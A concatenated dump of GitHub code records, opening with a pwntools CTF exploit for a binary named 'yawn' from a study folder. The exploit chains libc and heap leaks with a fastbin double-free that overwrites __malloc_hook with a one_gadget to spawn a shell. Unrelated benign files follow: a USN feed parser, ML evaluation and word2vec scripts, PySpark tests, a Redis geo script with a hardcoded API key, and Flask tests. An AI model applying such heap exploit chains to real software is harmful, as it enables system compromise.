True\nelse:\n\tdebug = False\n\nif debug:\n\tp = process(\"./yawn\")\n\tlibc = ELF(\"/lib/x86_64-linux-gnu/libc-2.23.so\")\n\telf = ELF(\"./yawn\")\nelse:\n\tpass\n\ndef add(name,desc):\n\tp.sendlineafter(\">> \",\"1\")\n\tp.sendafter(\"name: \",name)\n\tp.sendlineafter(\"desc: \",desc)\n\ndef edit(index,name,size,desc):\n\tp.sendlineafter(\">> \",\"2\")\n\tp.sendafter(\"name: \",name)\n\tp.sendlineafter(\"size: \",str(size))\n\tp.sendafter(\"desc: \",desc)\n\ndef free(index):\n\tp.sendlineafter(\">> \",\"3\")\n\tp.sendlineafter(\"idx: \",str(index))\n\ndef show(index):\n\tp.sendlineafter(\">> \",\"4\")\n\tp.sendlineafter(\"idx: \",str(index))\n\ndef debugf():\n\tgdb.attach(p,\"b *0x40103A\")\n\ncontext.log_level = \"debug\"\ncontext.terminal = [\"tmux\",\"splitw\",\"-v\"]\ndebugf()\n# leak libc\nadd(\"a\"*0x50,\"s\"*8 + p64(elf.got[\"read\"]))\nshow(0)\np.recvuntil(\"Description : \")\nread_addr = u64(p.recv(6).ljust(8,\"\\x00\"))\nlibc.address = read_addr - libc.symbols[\"read\"]\nlog.success(\"libc_base:\" + hex(libc.address))\n\n# leak heap\nbss_addr = 0x602040\nadd(\"a\"*0x50,\"s\"*8 + p64(bss_addr))\nshow(1)\np.recvuntil(\"Description : \")\nheap_addr = u64(p.recvuntil(\"\\n\",drop = True).ljust(8,\"\\x00\"))\nheap_base = heap_addr - 0x1040\nlog.success(\"heap_base:\"+hex(heap_base))\nadd(\"b\"*0x50,\"s\"*8 + p64(heap_base + 0x11f0)) #2\nadd(\"a\\n\",\"s\")\nfree(2)\nfree(3)\nadd(p64(libc.symbols[\"__malloc_hook\"] - 0x23) + \"\\n\",\"s\")\nadd(\"a\\n\",\"s\")\none_gadget = libc.address + 0xf02a4\npayload = \"aaa\" + \"a\"*8*2 + p64(one_gadget) + \"\\n\"\nadd(\"a\\n\",\"s\")\nadd(payload,\"s\")\nadd(\"a\\n\",\"s\")\np.interactive()\n","repo_name":"davidwu1999/Pwn","sub_path":"pwn_study/problem/double_free/YAWN/yawn.py","file_name":"yawn.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6704037651","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n'''\n@date: 2015-06-09\n@author: shell.xu\n'''\nimport logging, cStringIO\nfrom lxml import etree\nfrom lxml.cssselect import CSSSelector\nimport utils\n\nNS = 'http://www.w3.org/2005/Atom'\nURL = 'http://www.ubuntu.com/usn/rss.xml'\n\nsel_packages = CSSSelector('dl dd>a')\nsel_cves = CSSSelector('p>a')\n\ndef get_details(tree):\n run = False\n texts = []\n for e in tree.iter():\n if e.tag == 'h3':\n run = e.text == 'Details'\n elif run:\n s = etree.tostring(e, method='text', encoding='UTF-8').strip()\n texts.append(s)\n return ' '.join(texts)\n\ndef get_cves(tree):\n for cve in sel_cves(tree):\n href = cve.get('href')\n if href.startswith('http://people.ubuntu.com/~ubuntu-security/cve'):\n yield (cve.text, href)\n return\n\ndef parse_usn(e):\n name, title = e.find('title').text.split(':', 1)\n name, title = name.strip(), title.strip()\n link = e.find('link').text\n\n tree = etree.HTML(e.find('description').text)\n produces = [p.text for p in sel_packages(tree)]\n\n details = get_details(tree)\n descbuf = cStringIO.StringIO()\n descbuf.write(' {}\\n {}\\n * {}\\n'.format(title, details, link))\n for cve, url in get_cves(tree):\n descbuf.write(' # {}\\n * {}\\n'.format(cve, url))\n\n return {'name': name, 'produces': '\\n'.join(produces), 'desc': descbuf.getvalue()}\n\ndef parse_list(cache):\n r = utils.download(URL)\n if cache and r.status_code == 304:\n logging.info('usn url not modify, passed.')\n return\n\n logging.debug('parse usn xml')\n tree = etree.fromstring(r.content)\n for e in tree.iterfind('channel/item', namespaces={'ns': NS}):\n yield parse_usn(e)\n\ndef getlist(cache):\n try:\n usnlist = list(parse_list(cache))\n logging.info('usnlist length {}'.format(len(usnlist)))\n return usnlist\n except Exception as err:\n import traceback\n logging.error(traceback.format_exc())\n return []\n","repo_name":"shell909090/cves","sub_path":"usn.py","file_name":"usn.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"37516271424","text":"import torch\n# import numpy as np\nimport argparse\nimport os\nimport time\nimport tqdm\nfrom torch.utils.data import DataLoader\nfrom SPUBERT.dataset.ethucy import ETHUCYDataset\nfrom SPUBERT.dataset.sdd import SDDDataset\nfrom SPUBERT.model.spubert import (\n SPUBERTTGPConfig, SPUBERTMGPConfig, SPUBERTConfig, SPUBERTModel\n)\nfrom SPUBERT.model.loss import bom_loss\nfrom SPUBERT.dataset.grid_map_numpy import estimate_map_length, estimate_num_patch\n\ndef test():\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset_path', default='./data', help='dataset path')\n parser.add_argument('--dataset_name', default='ethucy', help='dataset name (ethucy, sdd)')\n parser.add_argument(\"--dataset_split\", default='univ', help='dataset split for ethucy dataset(eth, hotel, univ, zara1, zara2')\n parser.add_argument('--output_path', default='./output', help='output path')\n parser.add_argument('--output_name', default='test', help='output model name')\n parser.add_argument(\"--cuda\", action='store_true', help=\"training with CUDA\")\n parser.add_argument(\"--batch_size\", type=int, default=32, help=\"batch size\")\n parser.add_argument(\"--num_worker\", type=int, default=4, help=\"dataloader worker size\")\n parser.add_argument(\"--obs_len\", type=int, default=8, help=\"number of observation frames\")\n parser.add_argument(\"--pred_len\", type=int, default=12, help=\"number of prediction frames\")\n parser.add_argument(\"--num_nbr\", type=int, default=4, help=\"number of neighbors\")\n parser.add_argument(\"--view_range\", type=float, default=20.0, help=\"accessible range boundary of target pedestrian\")\n parser.add_argument(\"--view_angle\", type=float, default=2.09, help=\"accessible angle boundary of target pedestrian\")\n parser.add_argument(\"--social_range\", type=float, default=2.0, help=\"socially-aware range\")\n parser.add_argument(\"--env_range\", type=float, default=10.0, help=\"physically-aware range\")\n parser.add_argument(\"--env_resol\", type=float, default=0.2, help=\"physically-aware resolution\")\n parser.add_argument(\"--patch_size\", type=int, default=16, help=\"physically-aware patch size for ViT\")\n parser.add_argument('--scene', action='store_true', help='physically-aware, true, or false ')\n parser.add_argument(\"--hidden\", type=int, default=256, help=\"hidden size of transformer model\")\n parser.add_argument(\"--layer\", type=int, default=4, help=\"number of layers\")\n parser.add_argument(\"--head\", type=int, default=4, help=\"number of attention heads\")\n parser.add_argument(\"--goal_hidden\", type=int, default=64, help=\"goal hidden size of transformer model\")\n parser.add_argument(\"--goal_latent\", type=int, default=32, help=\"goal latent hidden size of transformer model\")\n parser.add_argument(\"--k_sample\", type=int, default=20, help=\"number of multimodal samples\")\n parser.add_argument(\"--d_sample\", type=int, default=1000, help=\"number of goal intention samples\")\n\n args = parser.parse_args()\n if args.dataset_name == 'ethucy':\n print(\"ETH/UCY Dataset Loading...\")\n test_dataset = ETHUCYDataset(split=\"test\", args=args)\n test_dataloader = DataLoader(test_dataset, batch_size=args.batch_size, num_workers=args.num_worker, shuffle=False)\n elif args.dataset_name == 'sdd':\n print(\"SDD Dataset Loading...\")\n args.dataset_split = 'default'\n test_dataset = SDDDataset(split=\"test\", args=args)\n test_dataloader = DataLoader(test_dataset, batch_size=args.batch_size, num_workers=args.num_worker, shuffle=False)\n else:\n print(\"Dataset is not loaded.\")\n\n model_path = os.path.join(args.output_path, args.dataset_name, args.dataset_split, args.output_name+\".pth\")\n\n if args.scene:\n num_patch = estimate_num_patch(estimate_map_length(args.env_range * 2, args.env_resol), args.patch_size)\n else:\n num_patch = 0\n \n spubert_tgp_cfgs = SPUBERTTGPConfig(\n hidden_size=args.hidden, num_layer=args.layer, num_head=args.head, obs_len=args.obs_len,\n pred_len=args.pred_len, num_nbr=args.num_nbr, scene=args.scene, num_patch=num_patch,\n patch_size=args.patch_size, view_range=args.view_range, view_angle=args.view_angle, social_range=args.social_range)\n\n spubert_mgp_cfgs = SPUBERTMGPConfig(\n hidden_size=args.hidden, num_layer=args.layer, num_head=args.head, k_sample=args.k_sample,\n goal_hidden_size=args.goal_hidden, goal_latent_size=args.goal_latent, obs_len=args.obs_len,\n pred_len=args.pred_len, num_nbr=args.num_nbr, scene=args.scene, num_patch=num_patch, patch_size=args.patch_size,\n view_range=args.view_range, view_angle=args.view_angle, social_range=args.social_range)\n spubert_cfgs = SPUBERTConfig(traj_cfgs=spubert_tgp_cfgs, goal_cfgs=spubert_mgp_cfgs)\n \n model = SPUBERTModel(spubert_tgp_cfgs, spubert_mgp_cfgs, spubert_cfgs)\n model.load_state_dict(torch.load(model_path))\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() and args.cuda else \"cpu\")\n model.to(device)\n diff_time = 0\n with torch.no_grad():\n model.eval()\n total_aderror = 0\n total_fderror = 0\n total_gderror = 0\n total_data = 0\n data_iter = tqdm.tqdm(enumerate(test_dataloader),\n desc=\"%s\" % (\"TEST\"),\n total=len(test_dataloader),\n bar_format=\"{l_bar}{r_bar}\")\n for i, data in data_iter:\n data = {key: value.to(device) for key, value in data.items()}\n if args.scene:\n start_time = time.time()\n outputs = model.inference(mgp_spatial_ids=data[\"mgp_spatial_ids\"],\n mgp_temporal_ids=data[\"mgp_temporal_ids\"], mgp_segment_ids=data[\"mgp_segment_ids\"], mgp_attn_mask=data[\"mgp_attn_mask\"],\n tgp_temporal_ids=data[\"tgp_temporal_ids\"], tgp_segment_ids=data[\"tgp_segment_ids\"], tgp_attn_mask=data[\"tgp_attn_mask\"],\n env_spatial_ids=data[\"env_spatial_ids\"], env_temporal_ids=data[\"env_temporal_ids\"],\n env_segment_ids=data[\"env_segment_ids\"], env_attn_mask=data[\"env_attn_mask\"], output_attentions=True, d_sample=args.d_sample)\n diff_time += (time.time() - start_time)\n else:\n start_time = time.time()\n outputs = model.inference(mgp_spatial_ids=data[\"mgp_spatial_ids\"],\n mgp_temporal_ids=data[\"mgp_temporal_ids\"], mgp_segment_ids=data[\"mgp_segment_ids\"], mgp_attn_mask=data[\"mgp_attn_mask\"],\n tgp_temporal_ids=data[\"tgp_temporal_ids\"], tgp_segment_ids=data[\"tgp_segment_ids\"], tgp_attn_mask=data[\"tgp_attn_mask\"],\n output_attentions=True, d_sample=args.d_sample)\n diff_time += (time.time() - start_time)\n\n avg_time = diff_time / (i + 1)\n\n outputs[\"pred_trajs\"] = torch.einsum('bkts,b->bkts', outputs[\"pred_trajs\"], data[\"scales\"])\n outputs[\"pred_goals\"] = torch.einsum('bks,b->bks', outputs[\"pred_goals\"], data[\"scales\"])\n data[\"traj_lbl\"] = torch.einsum('bts,b->bts', data[\"traj_lbl\"], data[\"scales\"])\n data[\"goal_lbl\"] = torch.einsum('bs,b->bs', data[\"goal_lbl\"], data[\"scales\"])\n gderror, aderror, fderror = bom_loss(\n outputs[\"pred_goals\"], outputs[\"pred_trajs\"], data[\"goal_lbl\"], data[\"traj_lbl\"],\n args.k_sample)\n\n total_aderror += aderror\n total_fderror += fderror\n total_gderror += gderror\n total_data += len(data[\"mgp_spatial_ids\"])\n print(\"\\nEpoch Evaluation Result >>>>> ADE: %f, FDE: %f, GDE: %f\" % (\n aderror / len(data[\"mgp_spatial_ids\"]), fderror / len(data[\"mgp_spatial_ids\"]),\n gderror / len(data[\"mgp_spatial_ids\"])))\n print(\"Epoch Average Time >>>>> \", avg_time)\n print(\"Total Evaluation Result >>>>> ADE: %f, FDE: %f, GDE: %f\" % (total_aderror/total_data, total_fderror/total_data, total_gderror/total_data))\n print(\"Total Average Computation Time >>>>> %f s\" % avg_time)\n\nif __name__=='__main__':\n test()","repo_name":"kina4147/SPUBERT","sub_path":"demo/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27270048043","text":"\nfrom scipy.sparse import *\nimport csv\nimport numpy as np\nimport pandas as pd\nimport sklearn.linear_model as sk\nfrom sklearn import svm\nimport sklearn.model_selection as ms\nimport string\nfrom gensim.models import word2vec\n\ndef construct_vector(data,set_to_fill,model,lengt):\n \"\"\"\n Creates an array that contains tweet features representation\n Arguments: data The set of tweet in string\n set_to_fill The array you need to fill with the corresponding features representation of the tweet at index i\n vocab a vocabulary that return the index of the word given in argument when doing vocab.get(word,-1) , and - 1 if not found\n embedding a Matrix that represent the feature representation of words (in accord of indexes with vocab)\n \"\"\" \n list_auxiliarry_pos = [\"must\",\"need\",\"should\",\"may\",\"might\",\"can\",\"could\",\"shall\",\"would\",\"will\"]\n list_auxiliarry_neg = [\"won't\",\"shouldn't\",\"not\",\"can't\",\"couldn't\",\"wouldn't\"]\n counter = lambda l1, l2: len(list(filter(lambda c: c in l2, l1))) #Used later to count number fo punctuation\n \n for j in range(0,np.shape(data)[0]): # For each tweet\n list_word = data[j].split() # Split into an array of words\n num_punctu = counter(data[j],string.punctuation) # count the punctuation\n divider = 0 #Initialize some parameters for additional features\n average = 0\n num_user =0\n num_url= 0\n num3point = 0\n num_aux_pos =0\n num_aux_neg =0\n for i in list_word: # For each word, fill the variable used for additional features\n average+=len(i)\n if(i==\"\"):\n num_user+=1\n if(i==\"\"):\n num_url+=1\n if(i==\"...\"): \n num3point+=1\n if(i in list_auxiliarry_pos):\n num_aux_pos+=1\n if(i in list_auxiliarry_neg):\n num_aux_neg+=1\n if(i in model):\n divider+=1\n set_to_fill[j,1:lengt+1] += model[i]\n if(divider>0):\n set_to_fill[j,1:lengt+1] = (set_to_fill[j,1:lengt+1]/divider)\n set_to_fill[j,lengt+1] = len(list_word) #add the # word\n set_to_fill[j,lengt+2] = num_punctu #add the # punctuation\n if(len(list_word)>0):\n set_to_fill[j,lengt+3] = average/len(list_word) #add length of word in average\n else :\n set_to_fill[j,lengt+3] = 0\n set_to_fill[j,lengt+4] = num_aux_pos #word in a list of auxilarry\n set_to_fill[j,lengt+5] = num_aux_neg #word in a list of negative aux\n set_to_fill[j,lengt+6] = num3point #number of ...\n set_to_fill[j,lengt+7] = num_user #number of \n set_to_fill[j,lengt+8] = num_url #number of \n return set_to_fill\n\ndef construct_features(path_pos,path_neg,train_path):\n '''\n construct a feature representation of each training tweet \n (by averaging the word vectors over all words of the tweet).\n Using the model created by word2vec\n '''\n size = 200\n window = 8\n sentences = word2vec.LineSentence(train_path) #Load the tweet (the whole training set)\n model = word2vec.Word2Vec(sentences,min_count = 2, size=size,window =window) # create the embeddding for each words, that appear more than 2 time\n # and with an embedding size of 200 and dependency windows of 8 characters\n print(\"finish construct model\")\n\t\n additional_features = 8 #Number of added features by hand (easier to scale the vectors)\n \n #Create tweet embedding for positive\n pos_train = open(path_pos,encoding='utf-8').readlines()\n lengt = size\n pos_mask = np.zeros(lengt+1+additional_features)\n pos_mask[0] +=1\n #adding 1 at start : this is target (1 is for happy emoji, 0 or -1 for sad face)\n #will add 3 features , number of word , average length of words, and #punctuation\n training_set_pos = np.zeros(((np.shape(pos_train)[0],lengt+1+additional_features))) + pos_mask\n #for each word, search if it is in pos_train or neg_train\n training_set_pos = construct_vector(pos_train,training_set_pos,model,lengt)\n \n #Create tweet embeddings for negative\n neg_train = open(path_neg,encoding='utf-8').readlines()\n training_set_neg = np.zeros(((np.shape(neg_train)[0],lengt+1+additional_features)))\n #for each word, search if it is in pos_train or neg_train\n training_set_neg = construct_vector(neg_train,training_set_neg,model,lengt)\n \n #Save the embeddings\n np.save('data/trainingsetword2vec_pos', training_set_pos)\n np.save('data/trainingsetword2vec_neg', training_set_neg)\n return model\n\t\ndef create_csv_submission(ids, y_pred, name):\n \"\"\"\n Creates an output file in csv format for submission to kaggle\n Arguments: ids (event ids associated with each prediction)\n y_pred (predicted class labels)\n name (string name of .csv output file to be created)\n \"\"\"\n with open(name, 'w') as csvfile:\n fieldnames = ['Id', 'Prediction']\n writer = csv.DictWriter(csvfile, delimiter=\",\", fieldnames=fieldnames)\n writer.writeheader()\n for r1, r2 in zip(ids, y_pred):\n writer.writerow({'Id':int(r1),'Prediction':int(r2)})\n\n\t\t\t\n\t\t\t\ndef predict_labels(model,path_testing,flag=\".npy\"):\n \"\"\"\n Used to predict the label on a given training Set\n With a constructed model from word2vec\n \"\"\"\n #Load the training set\n path_neg = str(\"data/trainingsetword2vec_neg\"+flag)\n path_pos = str(\"data/trainingsetword2vec_pos\"+flag)\n ts_neg = np.load(path_neg)\n ts_pos = np.load(path_pos)\n #Train a Linear Classifier: Train a linear classifier (e.g. logistic regression or SVM) on your constructed \n #features, using the scikit learn library, or your own code from the earlier labs. Recall that the labels \n #indicate if a tweet used to contain a :) or :( smiley.\n training_set = np.concatenate((ts_neg,ts_pos))\n y = training_set[:,0]\n X = training_set[:,1:np.shape(training_set)[1]]\n #Now we load and predict the data\n data = open(path_testing,encoding='utf-8').readlines()\n idx = np.zeros(np.shape(data)[0])\n tweets = [\"\" for a in range(0,np.shape(data)[0])]\n for i in range(0,np.shape(data)[0]):\n idx[i] =(i+1)\n tweets[i] = data[i]\n \n #Construct the logistic regressor\n LR = sk.LogisticRegressionCV()\n #LogisticRegression(penalty='l2', dual=False, tol=0.0001, C=1.0, fit_intercept=True, intercept_scaling=1, \n #class_weight=None, random_state=None, solver='liblinear', max_iter=100, multi_class='ovr', verbose=0, \n #warm_start=False, n_jobs=1)[source]¶\n #http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html\n #train the logistic regressor\n \n #Do a K fold on the training set to have an idea of the error.\n kf = ms.KFold(n_splits=3,shuffle=True)\n for train_idx, test_idx in kf.split(X):\n train_set = X[train_idx]\n test_set = X[test_idx]\n train_target = y[train_idx]\n test_target = y[test_idx] \n LR.fit(train_set,train_target)\n predictions_temp = LR.predict(test_set)\n print(predictions_temp.shape)\n print(test_target.shape) \n error = np.sum(np.power(predictions_temp-test_target,2))/np.shape(predictions_temp)[0]\n print(\"Yet, error is\",error)\n #Fit the prediction model\n LR.fit(X,y)\n\n #And now, predict the results\n topredict = construct_features_for_test_set(model,tweets)\n topredict_poly = topredict\n print(\"test set constructed\")\n predictions = LR.predict(topredict_poly)\n #Construct the submission\n predictions = predictions*2-1\n create_csv_submission(idx,predictions,\"submission.csv\")\n \ndef construct_features_for_test_set(model,test_set_tweet):\n \"\"\"\n Creates Features representation for the test set, we do not use the same method\n as the structure is a little different ( no labels)\n test_set_tweet: the text representation of the given tweets\n model ; the model used for word feature representation\n return : the representation in features of the set of tweet\n \"\"\"\n list_auxiliarry_pos = [\"must\",\"need\",\"should\",\"may\",\"might\",\"can\",\"could\",\"shall\",\"would\",\"will\"]\n list_auxiliarry_neg = [\"won't\",\"shouldn't\",\"not\",\"can't\",\"couldn't\",\"wouldn't\"]\n counter = lambda l1, l2: len(list(filter(lambda c: c in l2, l1))) #Used later to count number fo punctuation\n \n additional_features = 8\n lengt = 200\n test_set = np.zeros((np.shape(test_set_tweet)[0],lengt+additional_features))\n for j in range(0,np.shape(test_set)[0]):\n num_punctu = counter(test_set_tweet[j],string.punctuation)\n list_word = test_set_tweet[j].split()\n divider = 0\n average = 0\n num3point = 0\n num_aux_pos =0\n num_aux_neg =0\n num_user = 0\n num_url= 0\n for i in list_word:\n average+=len(i)\n if(i==\"\"):\n num_user+=1\n if(i==\"\"):\n num_url+=1\n if(i==\"...\"): \n num3point+=1\n if(i in list_auxiliarry_pos):\n num_aux_pos+=1\n if(i in list_auxiliarry_neg):\n num_aux_neg+=1\n if(i in model):\n divider+=1\n test_set[j,:lengt] += model[i]\n if(divider>0):\n test_set[j,:lengt] = (test_set[j,:lengt]/divider)\n test_set[j,lengt] = len(list_word) #add the # word\n test_set[j,lengt+1] = num_punctu #add the # punctuation\n if(len(list_word) >0):\n test_set[j,lengt+2] = average/len(list_word)#add length of word in average\n else : \n test_set[j,lengt+2] = 0\n test_set[j,lengt+3] = num_aux_pos #word in a list of auxilarry\n test_set[j,lengt+4] = num_aux_neg #word in a list of negative aux\n test_set[j,lengt+5] = num3point #number of ...\n test_set[j,lengt+6] = num_user #number of \n test_set[j,lengt+7] = num_url #number of \n return test_set\n\n\n","repo_name":"maxpr/PCML_Proj2","sub_path":"src/word2vec_routines.py","file_name":"word2vec_routines.py","file_ext":"py","file_size_in_byte":10164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34869741894","text":"import pytest\nfrom pyspark.sql.types import StructType, StructField, StringType\n\nimport quinn\nfrom tests.conftest import auto_inject_fixtures\nimport chispa\n\nfrom functools import reduce\n\n\n@auto_inject_fixtures(\"spark\")\ndef describe_with_columns_renamed():\n def it_renames_spaces_to_underscores(spark):\n def spaces_to_underscores(s):\n return s.replace(\" \", \"_\")\n\n schema = StructType(\n [\n StructField(\"i like cheese\", StringType(), True),\n StructField(\"yummy stuff\", StringType(), True),\n ]\n )\n data = [(\"jose\", \"a\"), (\"li\", \"b\"), (\"sam\", \"c\")]\n source_df = spark.createDataFrame(data, schema)\n actual_df = quinn.with_columns_renamed(spaces_to_underscores)(source_df)\n expected_df = spark.create_df(\n [(\"jose\", \"a\"), (\"li\", \"b\"), (\"sam\", \"c\")],\n [\n (\"i_like_cheese\", StringType(), True),\n (\"yummy_stuff\", StringType(), True),\n ],\n )\n chispa.assert_df_equality(actual_df, expected_df)\n\n def it_renames_dots_to_underscores(spark):\n def dots_to_underscores(s):\n return s.replace(\".\", \"_\")\n\n schema = StructType(\n [\n StructField(\"i.like.cheese\", StringType(), True),\n StructField(\"yummy.stuff\", StringType(), True),\n ]\n )\n data = [(\"jose\", \"a\"), (\"li\", \"b\"), (\"sam\", \"c\")]\n source_df = spark.createDataFrame(data, schema)\n actual_df = quinn.with_columns_renamed(dots_to_underscores)(source_df)\n expected_df = spark.create_df(\n [(\"jose\", \"a\"), (\"li\", \"b\"), (\"sam\", \"c\")],\n [\n (\"i_like_cheese\", StringType(), True),\n (\"yummy_stuff\", StringType(), True),\n ],\n )\n chispa.assert_df_equality(actual_df, expected_df)\n\n\ndef describe_with_some_columns_renamed():\n def it_renames_columns_based_on_a_map(spark):\n mapping = {\"chips\": \"french_fries\", \"petrol\": \"gas\"}\n\n def british_to_american(s):\n return mapping[s]\n\n def change_col_name(s):\n return s in mapping\n\n schema = StructType(\n [\n StructField(\"chips\", StringType(), True),\n StructField(\"hi\", StringType(), True),\n StructField(\"petrol\", StringType(), True),\n ]\n )\n data = [(\"potato\", \"hola!\", \"disel\")]\n source_df = spark.createDataFrame(data, schema)\n actual_df = quinn.with_some_columns_renamed(\n british_to_american, change_col_name\n )(source_df)\n expected_df = spark.create_df(\n [(\"potato\", \"hola!\", \"disel\")],\n [\n (\"french_fries\", StringType(), True),\n (\"hi\", StringType(), True),\n (\"gas\", StringType(), True),\n ],\n )\n chispa.assert_df_equality(actual_df, expected_df)\n\n def it_renames_some_columns_with_dots(spark):\n def dots_to_underscores(s):\n return s.replace(\".\", \"_\")\n\n def change_col_name(s):\n return s.startswith(\"a\")\n\n schema = StructType(\n [\n StructField(\"a.person\", StringType(), True),\n StructField(\"a.thing\", StringType(), True),\n StructField(\"b.person\", StringType(), True),\n ]\n )\n data = [(\"frank\", \"hot dog\", \"mia\")]\n source_df = spark.createDataFrame(data, schema)\n actual_df = quinn.with_some_columns_renamed(\n dots_to_underscores, change_col_name\n )(source_df)\n expected_df = spark.create_df(\n [(\"frank\", \"hot dog\", \"mia\")],\n [\n (\"a_person\", StringType(), True),\n (\"a_thing\", StringType(), True),\n (\"b.person\", StringType(), True),\n ],\n )\n chispa.assert_df_equality(actual_df, expected_df)\n\n\ndef describe_snake_case_col_names():\n def it_snake_cases_col_names(spark):\n schema = StructType(\n [\n StructField(\"I like CHEESE\", StringType(), True),\n StructField(\"YUMMMMY stuff\", StringType(), True),\n ]\n )\n data = [(\"jose\", \"a\"), (\"li\", \"b\"), (\"sam\", \"c\")]\n source_df = spark.createDataFrame(data, schema)\n actual_df = quinn.snake_case_col_names(source_df)\n expected_df = spark.create_df(\n [(\"jose\", \"a\"), (\"li\", \"b\"), (\"sam\", \"c\")],\n [\n (\"i_like_cheese\", StringType(), True),\n (\"yummmmy_stuff\", StringType(), True),\n ],\n )\n chispa.assert_df_equality(actual_df, expected_df)\n\n\ndef describe_sort_columns():\n def it_sorts_columns_in_asc_order(spark):\n source_df = spark.create_df(\n [\n (\"jose\", \"oak\", \"switch\"),\n (\"li\", \"redwood\", \"xbox\"),\n (\"luisa\", \"maple\", \"ps4\"),\n ],\n [\n (\"name\", StringType(), True),\n (\"tree\", StringType(), True),\n (\"gaming_system\", StringType(), True),\n ],\n )\n actual_df = quinn.sort_columns(source_df, \"asc\")\n expected_df = spark.create_df(\n [\n (\"switch\", \"jose\", \"oak\"),\n (\"xbox\", \"li\", \"redwood\"),\n (\"ps4\", \"luisa\", \"maple\"),\n ],\n [\n (\"gaming_system\", StringType(), True),\n (\"name\", StringType(), True),\n (\"tree\", StringType(), True),\n ],\n )\n chispa.assert_df_equality(actual_df, expected_df)\n\n def it_sorts_columns_in_desc_order(spark):\n source_df = spark.create_df(\n [\n (\"jose\", \"oak\", \"switch\"),\n (\"li\", \"redwood\", \"xbox\"),\n (\"luisa\", \"maple\", \"ps4\"),\n ],\n [\n (\"name\", StringType(), True),\n (\"tree\", StringType(), True),\n (\"gaming_system\", StringType(), True),\n ],\n )\n actual_df = quinn.sort_columns(source_df, \"desc\")\n expected_df = spark.create_df(\n [\n (\"oak\", \"jose\", \"switch\"),\n (\"redwood\", \"li\", \"xbox\"),\n (\"maple\", \"luisa\", \"ps4\"),\n ],\n [\n (\"tree\", StringType(), True),\n (\"name\", StringType(), True),\n (\"gaming_system\", StringType(), True),\n ],\n )\n chispa.assert_df_equality(actual_df, expected_df)\n\n def it_throws_an_error_if_the_sort_order_is_invalid(spark):\n source_df = spark.create_df(\n [\n (\"jose\", \"oak\", \"switch\"),\n (\"li\", \"redwood\", \"xbox\"),\n (\"luisa\", \"maple\", \"ps4\"),\n ],\n [\n (\"name\", StringType(), True),\n (\"tree\", StringType(), True),\n (\"gaming_system\", StringType(), True),\n ],\n )\n with pytest.raises(ValueError) as excinfo:\n quinn.sort_columns(source_df, \"cats\")\n assert (\n excinfo.value.args[0]\n == \"['asc', 'desc'] are the only valid sort orders and you entered a sort order of 'cats'\"\n )\n","repo_name":"MrPowers/quinn","sub_path":"tests/test_transformations.py","file_name":"test_transformations.py","file_ext":"py","file_size_in_byte":7310,"program_lang":"python","lang":"en","doc_type":"code","stars":534,"dataset":"github-code","pt":"37"} +{"seq_id":"37753230834","text":"import struct\nimport datetime\nfrom django_redis import get_redis_connection\nimport os,django\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"meet.settings\")# 项目名称\ndjango.setup()\n\nimport requests\n\n\ndef locatebyLatLng(lat, lng, pois=0):\n '''\n 根据经纬度查询地址\n '''\n items = {'location': str(lat) + ',' + str(lng), 'ak': 'XhDg0CerOl020ANVfHnl6aaXs4o47Au9', 'output': 'json'}\n res = requests.get('http://api.map.baidu.com/geocoder/v2/', params=items)\n result = res.json()\n # print(result)\n # print('--------------------------------------------')\n #result = result['result']['formatted_address'] + ',' + result['result']['sematic_description']\n # result_site = result['result']['addressComponent']['city']\n result_s = result['result']['formatted_address']\n\n return result_s\n\n\n\nconn = get_redis_connection('default')\n\nx = locatebyLatLng(lat=123, lng=23)\n\n\ndef geoadd(lng, lat, sites):\n\n add_site = conn.geoadd('site', lng, lat, sites) # 增加位置信息\n return '添加成功'\n# print(geoadd('116.28000233597092', '39.6679994936725', 'buzhidao'))\n\n\ndef geopos( site2):\n user_msg = conn.geopos('site', site2) #显示坐标位置信息\n return user_msg\n# print(geopos( 'beijing'))\n\n\ndef geodist(site1, site2):\n user_distance = conn.geodist('site', site1, site2, 'm') # 计算两地之间的距离\n return user_distance\n# print(geodist('chengdu', 'beijing'))\n\n\ndef georadiusbymember(condition, num):\n user_radius = conn.georadiusbymember('site', condition, num, 'm', 'withdist') # 计算范围内的距离\n for i in user_radius:\n print(i[0].decode())\n return user_radius\n\n# x = georadiusbymember('北京市大兴区魏永路', 100)\n# print(x)\n\n\n# name = str(input('请输入您的姓名:'))\n# birth_day = int(input('请输入您的出生日期:”'))\n# age = datetime.date.today().month\n# print(age)\n\n\n","repo_name":"hexiaowanmei/meet","sub_path":"homepage/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70929263467","text":"import secrets\nimport time\n\nfrom base64 import b64encode\nfrom datetime import datetime\n\nfrom flask_testing import TestCase\n\nfrom sip_api.app import app, db\nfrom sip_api.models import Call, Operator, User\nfrom sip_api.lib import const as c\n\n\nclass TestBase(TestCase):\n\n def create_app(self):\n return app\n\n def setUp(self):\n db.create_all()\n User(login='test', password='test', token='test').save()\n self.headers = {\n 'Authorization': 'Bearer test'\n }\n self._setTestData()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n\n def _setTestData(self):\n pass\n\n\nclass TestHealthCheck(TestBase):\n def test_health_check(self):\n response = self.client.get('/api/v1/health-check')\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.data, b'OK')\n\n\nclass TestAuth(TestBase):\n def test_auth(self):\n headers = {\n 'Authorization': 'Basic ' + b64encode(bytes(\"test:test\", 'ascii')).decode('ascii')\n }\n response = self.client.get(\"/users\", headers=headers)\n self.assertEqual(response.status_code, 200)\n self.assertIsNotNone(response.json['token'])\n\n\nclass TestGetEmptyOperatorList(TestBase):\n def test_get_operators(self):\n response = 